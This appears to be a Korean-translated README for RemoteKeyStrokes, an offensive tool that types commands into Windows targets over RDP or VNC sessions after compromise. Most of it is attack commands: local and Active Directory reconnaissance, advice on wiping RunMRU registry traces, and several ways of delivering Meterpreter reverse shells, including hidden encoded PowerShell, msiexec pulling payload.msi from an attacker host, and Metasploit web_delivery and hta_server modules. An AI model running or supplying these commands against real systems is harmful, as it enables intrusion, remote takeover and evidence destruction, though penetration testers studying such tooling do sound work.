
그래픽 데스크탑 프로그램을 통해 키 입력을 자동화하는 스크립트.
원격 데스크톱 세션을 통해 키 입력을 자동화하는 스크립트로, 공격자가 Living off the Land 기술과 함께 사용할 수 있도록 지원합니다. 모든 공로는 이를 가능하게 한 nopernik에게 있으며, 저는 이를 개선하기로 결정했습니다. 원격 데스크톱을 통해 명령을 실행할 때 사후 침투 단계에서 도움이 되는 도구를 원했습니다. 또한 자원을 체계적으로 수집하기 위한 SCPA 프로젝트를 만드는 데에도 사용되었습니다.
패키지 관리자에 따라 나머지 종속성을 설치하십시오.``` $ sudo apt install -y xfreerdp-x11 remmina xdotool
$ sudo dnf install -y xdotool freerdp-2 remmina
$ sudo pacman -S freerdp remmina xdotool
$ sudo emerge xwayland freerdp remmina xdotool
$ sudo nix-env -iA nixpkgs.xwayland nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina
### Setup
시스템에 프로그램을 설치하고 `rks`를 `remotekeystrokes`의 심볼릭 링크로 생성합니다. 이는 명령어 별칭으로 사용됩니다.```
$ sudo wget -O /usr/local/src/remotekeystrokes.sh https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/rks && \
sudo chmod 755 /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes /usr/local/bin/rks
$ remotekeystrokes -h Usage: remotekeystrokes
Flags:
COMMON OPTIONS: -c, --command <command | file> Specify a command or a file contains commands to execute
-p, --platform <operating_system> Specify the operating system ("windows" is
set by default if not specified)
-w, --windowname <window_name> Specify the window name to focus on the
active window ("freerdp" is set by default
if not specified)
-h, --help Display this help message
UPLOAD FILES: -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer
METHODS: -m, --method Specify a method. For command execution method "none" is set by default if not specified. For file transfer "pwshb64" is set by default if not specified. Other available methods are: "elevate", "persistence", "antiforensics", and "mayhem"
-s, --submethod <submethod> Specify a submethod from a method (applies
with -m flag)
-a, --action <action> Specify an action from a method and/or
submethod (applies with -m and/or -s flag)
-e, --evasion <evasion> Specify an evasion method for uploading files
(only works for "pwshb64")
## Usage
### 0x00 - Remote Authentication
#### 범례
- 달러 기호(`$`)는 일반 사용자 권한의 유닉스 셸 프롬프트를 나타내며, 명령어를 포함합니다.
- 꺾쇠괄호(`<>`)는 필수 매개변수를 의미합니다.
- 대괄호(`[]`)는 지정할 필요가 없는 선택적 매개변수를 의미합니다.
#### RDP
최신 운영 체제를 인증하려면 TLS(`/sec:tls`)로 강제 인증하거나 NLA(`/sec:nla`)로 인증하도록 플래그를 지정합니다.```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
레거시 운영 체제를 인증하려면 /sec:rdp 플래그를 지정하여 이전 인증을 강제합니다.```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"" /p:"" /v::[]
#### VNC
VNC 머신에 원격으로 인증하려면.```
$ remmina -c vnc://<username>:<password>@<IP>
$ ssh [-p ] @
#### Telnet```
$ telnet <IP> [PORT]
인증된 원격 세션으로 Windows 대상에서 명령을 실행할 때 remotekeystrokes(또는 별칭 명령 rks)를 사용합니다. 명령을 실행하기 전에 창 이름(-w)으로 탐색해야 하며, 기본적으로 xfreerdp 사용 시 FreeRDP를 검색합니다. 다른 원격 로그인 프로그램을 사용하는 시스템을 대상으로 할 경우 반드시 창 이름을 지정하십시오. -c 플래그를 지정하여 명령을 실행할 수 있습니다. 또한 명령을 삽입할 텍스트 파일을 준비하면 파일을 한 줄씩 읽습니다. 이 플래그는 문자열인지 파일인지 확인합니다.
FreeRDP, Remmina 및 기타 타사 프로그램과 같은 그래픽 원격 데스크톱 프로그램의 경우, telnet 및 ssh와 같은 원격 터미널 세션과는 다릅니다. 대상 머신 내의 활성 애플리케이션으로 커서를 이동해야 합니다. 예를 들어 Windows 환경에서는 명령 프롬프트(cmd.exe) 또는 PowerShell(powershell.exe)을 열어야 합니다. Windows에서는 대화 상자(-m dialogbox)를 사용하여 프로그램을 빠르게 실행할 수 있습니다. 이 방법으로 처음 실행한 후 레지스트리 항목에서 흔적을 삭제해야 합니다. 해당 항목은 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU에 있습니다. 단순히 Living off the Land(LotL) 기법만으로도 신속한 공격적 조치를 수행할 수 있는 예제를 확인할 수 있습니다.
로컬 머신 열거.``` $ cat recon_local_enum_cmds.txt whoami /all net user net localgroup Administrators ipconfig /all systeminfo
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_local_enum_cmds.txt [*] Executing commands... [+] Task completed!
단일 명령으로 실행하려면. 특히 대화 상자와 함께 사용할 때 간결합니다.```
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
Active Directory 열거.``` $ cat recon_ad_enum_cmds.txt net user /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain net group "Domain Computers" /domain
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_ad_enum_cmds.txt [*] Executing commands... [+] Task completed!
단일 명령으로 실행할 수 있습니다. 이는 대화 상자와 함께 사용할 때 특히 간결합니다.```
$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
로컬 머신 열거 (TODO)``` $ cat recon_local_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_local_enum_cmdlets.txt
Active directory 열거 (TODO)```
$ cat recon_ad_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_ad_enum_cmdlets.txt
PowerShell의 내용을 읽으면서 페이로드를 실행합니다.``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f psh -o payload.ps1
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ rks -c "powershell.exe" -m dialogbox
$ rks -c payload.ps1
`metasploit-framework` 익스플로잇 모듈 `exploit/multi/script/web_delivery`를 사용하여 powershell oneliner payload를 실행하십시오.```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"
Execute the payload with msiexec.exe while hosting a webserver.```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f msi -o payload.msi
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ sudo python -m http.server 80
$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/payload.msi" -m dialogbox
`mshta.exe`를 사용하여 `metasploit-framework` 익스플로잇 모듈 `exploit/windows/misc/hta_server`로 페이로드를 실행하십시오.```
$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> run"